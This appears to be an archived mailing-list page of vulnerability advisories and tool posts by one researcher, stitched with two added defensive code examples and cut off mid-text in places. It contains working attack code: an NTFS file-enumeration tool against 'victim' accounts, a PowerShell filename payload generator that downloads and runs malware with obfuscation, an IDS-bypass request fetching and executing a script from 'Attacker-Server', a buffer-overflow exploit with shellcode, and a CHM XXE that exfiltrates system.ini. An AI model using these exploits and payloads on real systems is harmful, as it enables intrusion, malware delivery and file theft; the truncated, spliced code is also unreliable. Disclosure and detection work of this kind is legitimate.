# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
# By John Page (aka hyp3rlinx) #
# Apparition Security  #
#==#

BANNER='''
_   ___ ___ _
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  )
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2.1

 By hyp3rlinx
 ApparitionSec

'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",".bat",
            ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a  -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
    parser.add_argument("-f", "

[FD] NtFileSins v2 / Windows NTFS Privileged File Access Enumeration Tool

2019-09-09 Thread hyp3rlinx
NtFileSins v2 exploits the Windows privileged file access enumeration
vulnerability to gather intelligence on privileged users. This version
includes Zone.Identifier checks to see if any discovered files were
internet downloaded.

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#=#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.   #
# By John Page (aka hyp3rlinx)#
# Apparition Security #
#=#

BANNER='''
_   ___ ___ _
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  )
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2

 By hyp3rlinx
 ApparitionSec

'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",".bat",
            ".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a  -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches

[FD] Windows NTFS / Privileged File Access Enumeration

2019-09-06 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Windows NTFS

NTFS is a proprietary journaling file system developed by Microsoft.
Starting with Windows NT 3.1, it is the default file system of the Windows
NT family.


[Vulnerability Type]
Privileged File Access Enumeration


[CVE Reference]
N/A


[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile
other user account activities by brute forcing a correct file name.
This is possible because Windows returns inconsistent error messages when
accessing unauthorized files that contain a valid extension
or have a "." (dot) as part of the file or folder name.

Typically, you see enumeration in web-application attacks which target
account usernames. In this case we are targeting the filenames
of other users, maybe we need to locate files up front that we wish to
steal possibly prior to launching say an XXE exploit to steal
those files or maybe we just passively sniff the accounts directories to
profile the mark and or learn their daily activities.

Standard account users attempting to open another user's files or folders
that do not contain a valid extension or dot "." in the filename
are always issued the expected "Access is denied" system error message.

However, for files that contain a (dot) in the filename and that also don't
exist, the system echoes the following attacker friendly warning:
"The system cannot find the file".

This error message inconsistency allows attackers to infer files EXIST,
because any other time we would get "The system cannot find the file".

Example, the Windows commands DIR or TYPE always greet attackers with an
expected "Access is denied" message, whether the file exists or not.
This helps protect users from having their local files known to attackers,
since the system returns the same message regardless if files
exist or not when using those commands. Those commands output messages are
not affected by the file having a valid extension or not.

However, we can bypass that protection by avoiding the Windows DIR or TYPE
commands and instead attempt to directly open any inaccessible
users file on the command line much like calling a program and pressing the
enter key.

After the Win32 API function CreateFile is called, it returns either:

1) "The system cannot find the file"
2) "Access is denied"

c:\>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file < DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio
McDoucheLeroy.contact
Access is denied.  <= EXISTS

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio
McDoucheLeroy.con
The system cannot find the file < DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied.  <= FALSE POSITIVE NO EXTENSION PRESENT IN THE
FILENAME

From a defensive perspective we can leverage this to try to detect basic
IOC and malware artifacts like .tmp, .ini, .dll, .exe
or related config files on disk with user-only rights, instead of
authenticating with admin rights, as a quick paranoid first pass.

Example, if malware hides itself by unlinking itself from the EPROCESS
list in memory or using programs like WinRAP to hide
processes from Windows TaskMgr, we may not discover them even if using the
tasklist command. The EPROCESS structure and flink/blink is
how Windows TaskMgr shows all running processes. However, we may possibly
detect them by testing for the correct IOC name if the
malicious code happens to reside on disk and not only in memory. What's cool
is we can do this without the need for admin rights.

Other Windows commands that will also let us confirm file existence by
comparing error messages are start, call, copy, icacls, and cd.
However, the Windows commands rename, ren, cacls, type, dir, erase, move and del
will issue flat out "Access is denied" messages.

Previously, MSRC recommended using ABE. However, that feature is only for
viewing files and folders in a shared folder, not when viewing
files or folders in the local file system.


Tested successfully Win7/10


[Exploit/POC]
"NtFileSins.py"

from subprocess import Popen, PIPE
import sys,argparse,re

# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determi

[FD] GGPowerShell / Windows PowerShell Unsanitized RCE File Tool

2019-08-30 Thread hyp3rlinx
Tool for creating Windows .PS files with the exploitable semicolon
condition. Has some options like reverse string PS command payload and
IP address as integer value etc...

http://hyp3rlinx.altervista.org/advisories/GGPowerShell.txt


from base64 import b64encode
from base64 import b64decode
from socket import *
import argparse,sys,socket,struct,re

#GGPowerShell
#Microsoft Windows PowerShell - Unsanitized Filename RCE Dirty File Creat0r.
#
#Original advisory:
#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
#
#Original PoC:
#https://www.youtube.com/watch?v=AH33RW9g8J4
#
#By John Page (aka hyp3rlinx)
#Apparition Security
#=
#Features added to the original advisory script:
#
#Original script may have issues with -O for save files with certain PS versions, so now uses -OutFile.
#
#Added: server port option (Base64 mode only)
#
#Added: -z Reverse String Command as an alternative to default Base64 encoding obfuscation.
#Example self reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes.
#
#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a
#
#-z payload requires a forced malware download on server-side, defaults port 80 and expects an ip-address.
#
#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433
#
#Added: Prefix whitespace - attempt to hide the filename payload by pushing it to the end of the filename.
#
#Since we have a space limit, malware names should try to be 5 chars max e.g. 'a.exe' including the ext to make room for
#IP/Host/Port and whitespace, especially when Base64 encoding; for the reverse command string option we have more room to play.
#e.g. a.exe or n.js (1 char for the name plus 2 to 3 chars for ext plus the dot).
#
#All in the name of the dirty PS filename.
#=

BANNER='''
     _ __   _ ____
  / / / __ \ _  _  _/ ___// /_ |__  // /   / /
 / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_  -i
flag, force-download or omit whitespace."


def parse_args():
    parser.add_argument("-s", "--server", help="Server to download malware from.")
    parser.add_argument("-p", "--port", help="Malware server port, defaults 80.")
    parser.add_argument("-m", "--locf", help="Name for the Malware upon download.")
    parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.")
    parser.add_argument("-f", "--force_download", nargs="?", const="1",
                        help="No malware name specified, malwares force downloaded from the server web-root, malware type must be known up front.")
    parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1",
                        help="Reverse string command obfuscation Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.")
    parser.add_argument("-w", "--wspace", help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.")
    parser.add_argument("-i", "--ipevade", nargs="?", const="1",
                        help="Use the integer value of the malware servers IP address for obfuscation/evasion.")
    parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases")
    return parser.parse_args()


#self reverse PS commands
def rev_str_command(args):
    malware=args.locf[::-1]
    revload=malware
    revload+=" trats;"
    revload+=malware
    revload+=" eliFtuO- "
    revload+=args.server[::-1]
    revload+=" rwi"

    payload = "$a='"
    payload+=malware
    payload+=" trats;"
    payload+=malware
    payload+=" eliFtuO- "
    payload+=args.server[::-1]
    payload+=" rwi'[-1..-"+str(len(revload))
    payload+="]-join '';iex $a"
    return payload


def ip2int(addr):
    return struct.unpack("!I", inet_aton(addr))[0]


def ip2hex(ip):
    x = ip.split('.')
    return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x))


def obfuscate_ip(target):
    IPHex = ip2hex(target)
    return str(ip2int(IPHex))


def decodeB64(p):
    return b64decode(p)


def validIP(host):
    try:
        socket.inet_aton(host)
        return True
    except socket.error:
        return False


def filename_sz(space,cmds,mode):
    if mode==0:
        return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1")
    else:
        return len(FILENAME_PREFIX) + len(space) + 1 + len(cmds) + len(";.ps1")


def check_filen
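Added example on the defensive side, not the GGPowerShell tool's own code: a file-name triage function that flags .ps1 names showing the features the tool's options produce, a semicolon in the name, leading whitespace padding, PowerShell command tokens, the [-1..-N]-join self-reversing literal, an integer-encoded IPv4 address, or a long Base64 run. The token list and length thresholds are assumptions chosen for this demo; the sample names are constructed, one of them wrapping the reversed-string payload quoted in the header comment above.

```python
import re

# Command tokens that have no business in a script's file name. Lookarounds
# are used instead of \b so that "-enc" (starting with a non-word char) is
# matched and "restart" / "backup-export" are not. Assumed list for the demo.
COMMAND_TOKENS = re.compile(
    r"(?<![\w-])(iex|iwr|invoke-expression|invoke-webrequest|invoke-restmethod|"
    r"start|start-process|powershell|-e(?:nc|ncodedcommand)?)(?![\w-])",
    re.IGNORECASE,
)
# The self-reversing construct used by the -z option: a string literal indexed
# [-1..-N] and re-joined, then fed to iex.
REVERSE_JOIN = re.compile(r"\[-1\.\.-\d+\]\s*-join", re.IGNORECASE)
# An IPv4 address written as one integer (the -i option), e.g. 2130706433.
INTEGER_IP = re.compile(r"(?<!\d)\d{8,10}(?!\d)")
# A long run of Base64 alphabet characters, as -EncodedCommand payloads are.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def analyse_ps1_name(filename):
    """Return the list of reasons a .ps1 file name looks like a command-injection
    payload; an empty list means nothing suspicious was seen. Only the name is
    inspected, never the contents, so this works on directory listings or
    file-creation events."""
    reasons = []
    if not filename.lower().endswith(".ps1"):
        return reasons
    stem = filename[:-4]
    if ";" in stem:
        reasons.append("semicolon in file name")
    padding = len(stem) - len(stem.lstrip())
    if padding:
        reasons.append("leading whitespace padding (%d chars)" % padding)
    if COMMAND_TOKENS.search(stem):
        reasons.append("PowerShell command token in file name")
    if REVERSE_JOIN.search(stem):
        reasons.append("self-reversing string command")
    if INTEGER_IP.search(stem):
        reasons.append("integer-encoded IPv4 address")
    if BASE64_RUN.search(stem):
        reasons.append("long Base64 run")
    return reasons


def triage(filenames):
    """Map each suspicious file name to its reasons; clean names are omitted."""
    result = {}
    for name in filenames:
        reasons = analyse_ps1_name(name)
        if reasons:
            result[name] = reasons
    return result


# Constructed sample names: one ordinary script, one non-script, and two
# names shaped like the tool's output.
SAMPLE_NAMES = [
    "Invoke-Backup.ps1",
    "notes.txt",
    "  $a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a;.ps1",
    "x;iwr 2130706433 -OutFile a.exe;start a.exe;.ps1",
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_NAMES).items():
        print(repr(name))
        for r in reasons:
            print("    - " + r)
```

The semicolon check alone already catches every name the tool can emit, since the advisory's condition depends on it; the other checks are there so an analyst reading the alert sees which evasion options were used.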

[FD] Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass

2019-07-26 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security


[Vendor]
www.trendmicro.com


[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and
over 105 different network protocols to discover advanced threats and
targeted attacks moving in and out of the network and laterally across it.
The appliance detects and analyzes malware, command-and-control (C&C)
communications, and evasive attacker activities that are invisible to
standard security defenses.



[Vulnerability Type]
Percent Encoding IDS Bypass


[CVE Reference]
Vendor decided not to release a CVE


[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for
malicious system commands like "Wget Commandline Injection" and they will
be flagged as high.
Attacker payloads sent with normal ascii characters, for example "wget",
or even ones that have been HEX encoded like "\x77\x67\x65\x74", will
still get flagged and alerted on.

However, attackers can easily bypass these alerts by sending malicious
commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74",
which also translates to "wget" and
will not get flagged or alerted on and may still be processed on the target
system.

e.g.

DDI RULE 2452
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is
still run by the vulnerable target if the payload is encoded using
percent/hex encoding like %77%67%65%74.
That will not only bypass the IDS by having no alert triggered or
notification sent, but the application will still process the malicious
command.

Importantly, the "wget" DDI Rule 2452 used is just an example and can
potentially be any malicious request where the IDS checks the character
encodings but fails to account for
percent encoded HEX character payload values.


[Exploit/POC]
from socket import *
#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

# Percent-encoded "wget" (%77%67%65%74) followed by the command line. The
# payload is one string; it is re-joined here after mail wrapping split it.
payload=("/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20"
         "http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a")
# "Host" needs the ": " separator, otherwise the header is malformed.
req = "GET "+payload+" HTTP/1.1\r\nHost: "+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)
res=""

while True:
    res = s.recv(512)
    print res
    # recv() returns an empty string once the server closes the connection;
    # the original test (res=="\n" or "") never broke on that condition.
    if not res:
        break

s.close()


#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure




hyp3rlinx

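Added example, not part of the advisory or its PoC: the canonicalisation step the advisory says the IDS was missing. A constructed stand-in for a "wget command line" rule is applied once to the request line as received and once after \xHH escapes and (repeated) percent-decoding are unwound. The rule is not Trend Micro's actual DDI rule 2452 and the request lines are constructed; the raw engine here is only there to show the gap, it does not model what DDI did or did not catch.

```python
import re
from urllib.parse import unquote

# Constructed stand-in for a "wget command line" signature: the word on its
# own, not as part of a longer identifier such as "widgets".
WGET_RULE = re.compile(r"(?<![A-Za-z0-9_])wget(?![A-Za-z0-9_])", re.IGNORECASE)

# C-style hex escape as it appears in the wire bytes: backslash, x, two hex digits.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def normalize(payload, max_rounds=3):
    """Canonicalise a request string before signature matching: turn \\xHH
    escapes into characters and percent-decode, repeating up to `max_rounds`
    times so that double-encoded input (%2577 -> %77 -> w) is also unwound.
    Stops early once a round changes nothing. Bounding the rounds keeps a
    deliberately deep encoding from turning into a CPU sink."""
    current = payload
    for _ in range(max_rounds):
        decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), current)
        decoded = unquote(decoded)
        if decoded == current:
            break
        current = decoded
    return current


def matches_raw(payload):
    """Naive engine: the rule applied to the bytes exactly as they arrived."""
    return bool(WGET_RULE.search(payload))


def matches_normalized(payload):
    """Same rule applied after canonicalisation."""
    return bool(WGET_RULE.search(normalize(payload)))


def evaluate(requests):
    """Return {request: (raw_hit, normalized_hit)} for a batch of request lines."""
    return {r: (matches_raw(r), matches_normalized(r)) for r in requests}


# Constructed sample request lines: plain, \x-escaped, percent-encoded (the
# form the advisory reports as missed), double percent-encoded, and benign.
SAMPLES = [
    "GET /index.php?cmd=wget%20http://example.invalid/x HTTP/1.1",
    "GET /index.php?cmd=\\x77\\x67\\x65\\x74%20http://example.invalid/x HTTP/1.1",
    "GET /index.php?cmd=%77%67%65%74%20http://example.invalid/x HTTP/1.1",
    "GET /index.php?cmd=%2577%2567%2565%2574%20http://example.invalid/x HTTP/1.1",
    "GET /index.php?page=widgets HTTP/1.1",
]

if __name__ == "__main__":
    for req, (raw_hit, norm_hit) in evaluate(SAMPLES).items():
        print("raw=%-5s normalized=%-5s %s" % (raw_hit, norm_hit, req))
```

Only the first sample trips the raw engine; after normalisation the \x, percent and double-percent forms all reduce to the same "wget " and match, while the benign "widgets" request stays clean in both engines.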


[FD] CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day

2019-07-16 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security


[Vendor]
www.computerlab.com


[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and
control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network
Communication Protocol).
Agents are built into the clients for remote management and configuration.


[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day


[CVE Reference]
CVE-2019-13577


[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an
Unauthenticated Remote Buffer Overflow via a long string to the CE Remote
feature listening on Port 987.
This will overwrite data on the stack/registers and allow for control of
the programs execution flow resulting in attacker supplied remote code
execution.
Authentication is not required for this exploit.

This program seems to be packed using ASPack v2.12 and can be difficult to
unpack because it uses self-modifying code.
When installing the vulnerable program, if it asks for a serial number just
enter a value of "1" or something.
Upon launching the program, if any errors occur try right-clicking SnmpAdm.exe
and running it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in the
AppData\Local\Temp directory; make OS system files viewable in Explorer to
see them.

e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR / SEH all set to False helping to make exploit more portable.

CALL EBX
10008FB3   0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364
(C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII
"AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)



[Exploit/POC]
from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack(" 1:
print "[*] No args supplied see Help -h"
exit()
main(parse_args())





[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure




hyp3rlinx



Re: [FD] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

2019-07-16 Thread hyp3rlinx
[** CORRECTION Fixed Port Typo]

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with the extension
.CHM, for Compiled HTML. The format is often used for software
documentation.
CHM is an extension for the Compiled HTML file format, most commonly used
by Microsoft's HTML-based help program.


[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection


[CVE Reference]
N/A


[Security Issue]
CHM Files are usually created using Microsoft's "HTML Help Workshop"
program. However, I found a way to bypass using this program and create them
easily by
simply adding a double .chm extension to the file ".chm.chm". Compiled HTML
Help "hh.exe" will then respect and open it, processing any JS/HTML/XML
inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks
allowing remote attackers to steal and exfiltrate local system files.

What's interesting about this one is we can create the file without using
the "Microsoft HTML Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID:
52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While CHM is already considered a "dangerous" file type and other types of
attacks have already been documented, I thought this was an interesting way
to
create CHM files "Uncompiled", bypassing the default creation steps while
stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.


[Exploit/POC]
1) python -m SimpleHTTPServer


2) "XXE.chm.chm"

Uncompiled CHM File XXE PoC

http://localhost:81/payload.dtd;>
%dtd;]>


3) "payload.dtd"  (hosted in python web-server dir port 81 above)

http://localhost:81?%file;'>">
%all;


Open the "XXE.chm.chm" file and it will exfil Windows "system.ini"; the attacker
server IP is set to localhost using port 81 for the PoC.

Tested successfully Windows 7/10


[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by
design"
July 16, 2019 : Public Disclosure




hyp3rlinx

On Tue, Jul 16, 2019 at 12:10 AM hyp3rlinx  wrote:

> [+] Credits: John Page (aka hyp3rlinx)
> [+] Website: hyp3rlinx.altervista.org
> [+] Source:
> http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
> [+] ISR: ApparitionSec
>
>
> [Vendor]
> www.microsoft.com
>
>
> [Product]
> Microsoft Compiled HTML Help "hh.exe"
>
> Microsoft Compiled HTML Help is a Microsoft proprietary online help
> format, consisting of a collection of HTML pages, an index and other
> navigation tools.
> The files are compressed and deployed in a binary format with the
> extension .CHM, for Compiled HTML. The format is often used for software
> documentation.
> CHM is an extension for the Compiled HTML file format, most commonly used
> by Microsoft's HTML-based help program.
>
>
> [Vulnerability Type]
> Uncompiled .CHM File XML External Entity Injection
>
>
> [CVE Reference]
> N/A
>
>
> [Security Issue]
> CHM Files are usually created using Microsoft's "HTML Help Workshop"
> program. However, I found a way to bypass using this program and create them
> easily by
> simply adding a double .chm extension to the file ".chm.chm". Compiled HTML
> Help "hh.exe" will then respect and open it processing any JS/HTML/XML
> insid

[FD] Microsoft File Checksum Integrity Verifier "fciv.exe" v2.05 / DLL Hijack Arbitrary Code Execution

2019-07-05 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-FILE-CHECKSUM-VERIFIER-v2.05-DLL-HIJACKING-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
File Checksum Integrity Verifier version 2.05 "fciv.exe"

Download:
